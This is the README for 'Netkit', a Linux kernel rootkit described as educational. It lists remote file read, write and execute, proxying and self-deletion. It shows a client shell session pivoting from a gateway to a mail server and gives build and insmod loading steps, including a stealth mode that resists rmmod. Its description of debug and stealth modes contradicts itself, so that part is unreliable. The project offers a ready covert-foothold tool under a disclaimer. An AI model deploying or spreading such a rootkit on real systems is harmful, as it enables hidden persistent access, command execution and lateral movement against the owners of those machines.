Netkit
Linux rootkit for educational purposes
Netkit is a purposefully small rootkit that clients can use over the network to maintain a sneaky foothold on a device.
Overview
Netkit has several features:
- File read
- File write
- File execute (stderr + stdout)
- Proxy
- Self deletion (stopping the module from running and freeing resources)
Usage
Once the rootkit is loaded into the system, a user may want to interact with it using the provided pseudo-shell:
$ cd netkit
$ python3 client/shell.py 10.10.10.1:8008
10.10.10.1:8008/ $ hosts
usage:
- hosts push <ip>:<port>
- hosts pop
10.10.10.1:8008/ $ hostname
gateway-1a723f
10.10.10.1:8008/ $ hosts push 10.10.10.2:8008
[+] successfully added device 10.10.10.2:8008 to hosts list
10.10.10.1:8008->10.10.10.2:8008/ $ hostname
mail-server
Compilation
To run the rootkit, optionally tweak its configuration, build it using make and ship it using insmod or any other kernel module loader.
==== Please make sure to adjust CONFIG_NETKIT_DEBUG to your liking ====
If CONFIG_NETKIT_DEBUG is enabled, then stealth mode is enabled and the rootkit can only be stopped using the self destruct / exit cmd (not using rmmod).
Make sure to set $KERNEL_DIR to your kernel's header files, like KERNEL_DIR=/usr/src/linux-headers-$(uname -r)
git clone https://github.com/notselwyn/netkit/
cd netkit
make KERNEL_DIR=$KERNEL_DIR
ls -la netkit.ko
Running it with notselwyn/kernel-scripts
Since the rootkit was developed with the author's kernel-scripts, it's a breeze to debug and test. Simply download the scripts and compile a compatible Linux kernel.
To run the kernel:
cd netkit
create-image.sh
run.sh $KERNEL_DIR
To run and interact with the rootkit (make sure it's in debug mode to allow for rmmod in run_kmod.sh):
cd netkit
run_kmod.sh netkit.ko netkit
run_python.sh client/shell.py
Disclaimer
The programs and scripts ("programs") in this software directory/folder/repository ("repository") are published, developed and distributed for educational/research purposes only. I ("the creator") do not condone any malicious or illegal usage of the programs in this repository, as the intent is sharing research and not doing illegal activities with it. I am not legally responsible for anything you do with the programs in this repository.
